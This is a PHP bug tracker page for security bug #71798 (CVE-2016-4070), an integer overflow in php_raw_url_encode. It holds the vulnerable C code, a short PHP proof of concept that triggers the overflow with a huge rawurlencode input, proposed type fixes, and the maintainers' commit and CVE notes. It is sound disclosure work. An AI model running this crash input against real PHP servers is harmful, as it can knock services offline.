php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #71798 Integer Overflow in php_raw_url_encode
Submitted: 2016-03-11 11:37 UTC Modified: 2016-04-25 07:00 UTC
From: taoguangchen at icloud dot com Assigned: stas
Status: Closed Package: *General Issues
PHP Version: 5.5.33 OS:
Private report: No CVE-ID: 2016-4070
 [2016-03-11 11:37 UTC] taoguangchen at icloud dot com
Description:
------------
```
PHPAPI char *php_raw_url_encode(char const *s, int len, int *new_length)
{
	register int x, y;
	unsigned char *str;

	str = (unsigned char *) safe_emalloc(3, len, 1);
	for (x = 0, y = 0; len--; x++, y++) {
	str[y] = (unsigned char) s[x];
```

PoC:
```
<?php

ini_set('memory_limit', -1);
rawurlencode(str_repeat('&', 0xffffffff/3));

?>
```

Fix:
```
-	register int x, y;
+	register unsigned int x, y;
```


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-03-11 11:48 UTC] taoguangchen at icloud dot com
Better Fix:
```
-	register int x, y;
+	register size_t x, y;

```
 [2016-03-27 21:23 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-03-27 21:23 UTC] stas@php.net
In security repo as 95433e8e339dbb6b5d5541473c1661db6ba2c451
 [2016-03-27 21:25 UTC] stas@php.net
Not sure if this qualifies as security issue (probably not) but since we release new version in 2 days anyway I'll just fix it as one.
 [2016-03-29 06:55 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=95433e8e339dbb6b5d5541473c1661db6ba2c451
Log: Fix bug #71798 - Integer Overflow in php_raw_url_encode
 [2016-03-29 06:55 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-03-29 09:30 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=95433e8e339dbb6b5d5541473c1661db6ba2c451
Log: Fix bug #71798 - Integer Overflow in php_raw_url_encode
 [2016-04-25 06:15 UTC] henri at nerv dot fi
Please use CVE-2016-4070 as discussed in http://www.openwall.com/lists/oss-security/2016/04/11/7
 [2016-04-25 07:00 UTC] stas@php.net
-CVE-ID: +CVE-ID: 2016-4070
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Fri Feb 24 01:01:37 2017 UTC